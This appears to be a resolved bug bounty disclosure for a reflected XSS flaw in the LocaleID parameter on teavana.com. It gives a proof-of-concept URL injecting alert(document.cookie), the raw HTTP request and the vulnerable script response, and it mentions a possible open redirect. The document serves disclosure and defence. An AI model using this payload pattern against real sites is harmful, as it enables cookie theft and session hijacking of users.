Reflected XSS on teavana.com (Locale-Change)
Medium
S
Starbucks
Submitted None
Actions:
Reported by
inhibitor181
Vulnerability Details
Technical details and impact analysis
SUMMARY
----
Hello, the link at https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Locale-Change?LocaleID=en_CA (was identified by changing languages) is prone to reflected XSS in the "en" zone of the LocaleID parameter. One can inject javascript that will be reflected back to the target while calling the modified link.
POC
-----
https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Locale-Change?LocaleID=eas%27;alert(document.cookie);//an_CA
This injection is possible because the contents before the _CA are not validated and it will be injected in the response.
Request :
```
GET /on/demandware.store/Sites-Teavana-Site/default/Locale-Change?LocaleID=eas%27;alert(1);//dasdsan_CA HTTP/1.1
Host: www.teavana.com
```
Response :
```
<script type="text/javascript">
var uri = 'https:///on/demandware.store/Sites-StarbucksCA-Site/eas';alert(1);//dasdsan_CA/Home-Show';
uri=decodeURIComponent(uri);
if(uri.indexOf("/ca/en") >=0){
uri=uri.replace("/ca/en","");
}
else if(uri.indexOf("/ca/fr") >=0){
uri=uri.replace("/ca/fr","");
}
window.location = uri;
</script>
```
Note the : var uri = 'https:///on/demandware.store/Sites-StarbucksCA-Site/eas';alert(1);//dasdsan_CA/Home-Show';
This can also be modified to easily make an open redirect.
Also attached screenshot.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Generic